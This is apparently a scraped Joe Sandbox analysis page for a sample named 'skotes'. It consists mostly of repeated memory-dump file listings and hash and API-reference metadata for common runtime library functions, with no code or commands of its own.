Associated: 00000006.00000002.2967788512.0000000000B35000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967968423.0000000000B36000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968262430.0000000000B38000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968402647.0000000000B3A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968707394.0000000000B3C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2969551208.0000000000B45000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970023802.0000000000B46000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970506072.0000000000B47000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970863169.0000000000B48000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971131605.0000000000B63000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971393726.0000000000B64000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971653636.0000000000B66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971851409.0000000000B67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972152564.0000000000B6F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972407654.0000000000B74000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972592296.0000000000B75000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972777856.0000000000B79000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972998935.0000000000B8E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973179747.0000000000B91000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973392344.0000000000B92000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973608752.0000000000B96000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973780405.0000000000B9D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974000799.0000000000BA0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974168686.0000000000BA7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974364643.0000000000BA8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974575970.0000000000BB0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974786379.0000000000BB2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974992299.0000000000BC1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975203667.0000000000BC2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975337697.0000000000BC4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975539261.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975712668.0000000000BCA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975930946.0000000000BD1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976189209.0000000000BEE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976395931.0000000000BF3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976395931.0000000000C11000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976880868.0000000000C3F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977217260.0000000000C40000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977562118.0000000000C41000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977779299.0000000000C44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977998863.0000000000C46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2978168524.0000000000C56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2978390609.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_940000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Proxy::Scheduler$ExecutionHardware$AffinityAffinity::BorrowedCoreCountCurrentFixedIncrementListResourceResource::StateToggle
String ID:
API String ID: 932774601-0
Opcode ID: 3834a7e1bb706abc72fb608d460adb290de97c66bd7e8137002459dbc2d52c84
Instruction ID: ccf271b9e8f96e1386434aa6179af4b6ef95dda2daaf18ba0836b0fdc1099ebf
Opcode Fuzzy Hash: 3834a7e1bb706abc72fb608d460adb290de97c66bd7e8137002459dbc2d52c84
Instruction Fuzzy Hash: C821A732900B159FCB24EF65C9909ABF3F9FF89300700495EE843A7661DB34B905CBA2

Function 00964885 Relevance: 6.0, APIs: 4, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

ListArray.LIBCONCRT ref: 00964893
ListArray.LIBCONCRT ref: 009648A5

Part of subcall function 00965555: _InternalDeleteHelper.LIBCONCRT ref: 00965564

ListArray.LIBCONCRT ref: 009648AF
_InternalDeleteHelper.LIBCONCRT ref: 009648C8

Memory Dump Source

Source File: 00000006.00000002.2960262313.0000000000941000.00000040.00000001.01000000.00000007.sdmp, Offset: 00940000, based on PE: true

Associated: 00000006.00000002.2959959469.0000000000940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2960262313.00000000009A2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2963225351.00000000009A9000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2963895265.00000000009AB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2964785557.00000000009B7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2966475323.0000000000B0F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2966741111.0000000000B11000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967055819.0000000000B24000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967055819.0000000000B30000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967559238.0000000000B34000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967788512.0000000000B35000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967968423.0000000000B36000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968262430.0000000000B38000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968402647.0000000000B3A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968707394.0000000000B3C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2969551208.0000000000B45000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970023802.0000000000B46000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970506072.0000000000B47000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970863169.0000000000B48000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971131605.0000000000B63000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971393726.0000000000B64000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971653636.0000000000B66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971851409.0000000000B67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972152564.0000000000B6F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972407654.0000000000B74000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972592296.0000000000B75000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972777856.0000000000B79000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972998935.0000000000B8E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973179747.0000000000B91000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973392344.0000000000B92000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973608752.0000000000B96000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973780405.0000000000B9D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974000799.0000000000BA0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974168686.0000000000BA7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974364643.0000000000BA8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974575970.0000000000BB0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974786379.0000000000BB2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974992299.0000000000BC1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975203667.0000000000BC2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975337697.0000000000BC4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975539261.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975712668.0000000000BCA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975930946.0000000000BD1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976189209.0000000000BEE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976395931.0000000000BF3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976395931.0000000000C11000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976880868.0000000000C3F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977217260.0000000000C40000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977562118.0000000000C41000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977779299.0000000000C44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977998863.0000000000C46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2978168524.0000000000C56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2978390609.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_940000_skotes.jbxd

Yara matches

Similarity

API ID: ArrayList$DeleteHelperInternal
String ID:
API String ID: 3844194624-0
Opcode ID: 98398c8d9d3603e7f188d9b08dd388af16fbd3646e7d661a02fa6197aaeff0fc
Instruction ID: d704e80024e41304c999662150bff274d4d249d5d4ddbfb21eff57e3449d5c5c
Opcode Fuzzy Hash: 98398c8d9d3603e7f188d9b08dd388af16fbd3646e7d661a02fa6197aaeff0fc
Instruction Fuzzy Hash: 4001D171601521AFCA25BBA6D886F6EB76BBFC4710B010129F90497612CF20EC2687A0

Function 0096EE5C Relevance: 6.0, APIs: 4, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

ListArray.LIBCONCRT ref: 0096EE6A
ListArray.LIBCONCRT ref: 0096EE7C

Part of subcall function 0096EF29: _InternalDeleteHelper.LIBCONCRT ref: 0096EF3B

ListArray.LIBCONCRT ref: 0096EE86
_InternalDeleteHelper.LIBCONCRT ref: 0096EE9F

Memory Dump Source

Source File: 00000006.00000002.2960262313.0000000000941000.00000040.00000001.01000000.00000007.sdmp, Offset: 00940000, based on PE: true

Associated: 00000006.00000002.2959959469.0000000000940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2960262313.00000000009A2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2963225351.00000000009A9000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2963895265.00000000009AB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2964785557.00000000009B7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2966475323.0000000000B0F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2966741111.0000000000B11000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967055819.0000000000B24000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967055819.0000000000B30000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967559238.0000000000B34000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967788512.0000000000B35000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967968423.0000000000B36000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968262430.0000000000B38000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968402647.0000000000B3A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968707394.0000000000B3C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2969551208.0000000000B45000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970023802.0000000000B46000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970506072.0000000000B47000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970863169.0000000000B48000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971131605.0000000000B63000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971393726.0000000000B64000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971653636.0000000000B66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971851409.0000000000B67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972152564.0000000000B6F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972407654.0000000000B74000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972592296.0000000000B75000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972777856.0000000000B79000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972998935.0000000000B8E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973179747.0000000000B91000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973392344.0000000000B92000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973608752.0000000000B96000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973780405.0000000000B9D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974000799.0000000000BA0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974168686.0000000000BA7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974364643.0000000000BA8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974575970.0000000000BB0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974786379.0000000000BB2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974992299.0000000000BC1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975203667.0000000000BC2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975337697.0000000000BC4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975539261.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975712668.0000000000BCA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975930946.0000000000BD1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976189209.0000000000BEE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976395931.0000000000BF3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976395931.0000000000C11000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976880868.0000000000C3F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977217260.0000000000C40000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977562118.0000000000C41000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977779299.0000000000C44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977998863.0000000000C46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2978168524.0000000000C56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2978390609.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_940000_skotes.jbxd

Yara matches

Similarity

API ID: ArrayList$DeleteHelperInternal
String ID:
API String ID: 3844194624-0
Opcode ID: cf42bcc515e332d4ce6e2bcf7bb73ab853f0e63ae19b3a373d7bf4f19e5c71b7
Instruction ID: 3dbc82ca532361f7915cecfd727654536b9101b15fa1d192a1e182f68525b49e
Opcode Fuzzy Hash: cf42bcc515e332d4ce6e2bcf7bb73ab853f0e63ae19b3a373d7bf4f19e5c71b7
Instruction Fuzzy Hash: 1101D635601521AFCA26BBA2D8C2F7EBB6ABFC47117000029F90457611CF21FC1697E0

Function 0096D0B7 Relevance: 6.0, APIs: 4, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

ListArray.LIBCONCRT ref: 0096D0C5
ListArray.LIBCONCRT ref: 0096D0D7

Part of subcall function 0096C6B2: _InternalDeleteHelper.LIBCONCRT ref: 0096C6C4

ListArray.LIBCONCRT ref: 0096D0E1
_InternalDeleteHelper.LIBCONCRT ref: 0096D0FA

Memory Dump Source

Source File: 00000006.00000002.2960262313.0000000000941000.00000040.00000001.01000000.00000007.sdmp, Offset: 00940000, based on PE: true

Associated: 00000006.00000002.2959959469.0000000000940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2960262313.00000000009A2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2963225351.00000000009A9000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2963895265.00000000009AB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2964785557.00000000009B7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2966475323.0000000000B0F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2966741111.0000000000B11000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967055819.0000000000B24000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967055819.0000000000B30000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967559238.0000000000B34000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967788512.0000000000B35000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967968423.0000000000B36000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968262430.0000000000B38000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968402647.0000000000B3A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968707394.0000000000B3C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2969551208.0000000000B45000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970023802.0000000000B46000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970506072.0000000000B47000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970863169.0000000000B48000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971131605.0000000000B63000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971393726.0000000000B64000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971653636.0000000000B66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971851409.0000000000B67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972152564.0000000000B6F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972407654.0000000000B74000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972592296.0000000000B75000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972777856.0000000000B79000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972998935.0000000000B8E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973179747.0000000000B91000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973392344.0000000000B92000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973608752.0000000000B96000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973780405.0000000000B9D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974000799.0000000000BA0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974168686.0000000000BA7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974364643.0000000000BA8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974575970.0000000000BB0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974786379.0000000000BB2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974992299.0000000000BC1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975203667.0000000000BC2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975337697.0000000000BC4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975539261.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975712668.0000000000BCA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975930946.0000000000BD1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976189209.0000000000BEE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976395931.0000000000BF3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976395931.0000000000C11000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976880868.0000000000C3F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977217260.0000000000C40000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977562118.0000000000C41000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977779299.0000000000C44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977998863.0000000000C46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2978168524.0000000000C56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2978390609.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_940000_skotes.jbxd

Yara matches

Similarity

API ID: ArrayList$DeleteHelperInternal
String ID:
API String ID: 3844194624-0
Opcode ID: 301a25bafad448eddd3c0c8abeaf4245b414378d7782a7b62a16a22e3692bba1
Instruction ID: a849dc5b548f1211eb1be7a650c70f9d1c6869107276bf6f3d1f4a243c435082
Opcode Fuzzy Hash: 301a25bafad448eddd3c0c8abeaf4245b414378d7782a7b62a16a22e3692bba1
Instruction Fuzzy Hash: 1101D171702522AFCA35BB62C886F7DB76ABFC5711701042AF94097612CF60AC6697E4

Function 009733C1 Relevance: 6.0, APIs: 4, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 009733DB
Concurrency::details::VirtualProcessor::ServiceMark.LIBCMT ref: 009733EF
Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 00973407
Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 0097341F

Memory Dump Source

Source File: 00000006.00000002.2960262313.0000000000941000.00000040.00000001.01000000.00000007.sdmp, Offset: 00940000, based on PE: true

Associated: 00000006.00000002.2959959469.0000000000940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2960262313.00000000009A2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2963225351.00000000009A9000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2963895265.00000000009AB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2964785557.00000000009B7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2966475323.0000000000B0F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2966741111.0000000000B11000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967055819.0000000000B24000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967055819.0000000000B30000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967559238.0000000000B34000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967788512.0000000000B35000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967968423.0000000000B36000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968262430.0000000000B38000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968402647.0000000000B3A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968707394.0000000000B3C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2969551208.0000000000B45000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970023802.0000000000B46000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970506072.0000000000B47000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970863169.0000000000B48000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971131605.0000000000B63000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971393726.0000000000B64000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971653636.0000000000B66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971851409.0000000000B67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972152564.0000000000B6F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972407654.0000000000B74000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972592296.0000000000B75000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972777856.0000000000B79000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972998935.0000000000B8E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973179747.0000000000B91000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973392344.0000000000B92000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973608752.0000000000B96000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973780405.0000000000B9D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974000799.0000000000BA0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974168686.0000000000BA7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974364643.0000000000BA8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974575970.0000000000BB0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974786379.0000000000BB2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974992299.0000000000BC1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975203667.0000000000BC2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975337697.0000000000BC4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975539261.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975712668.0000000000BCA000.00000080.00000001.01000000.00000007.sdmpDownload File
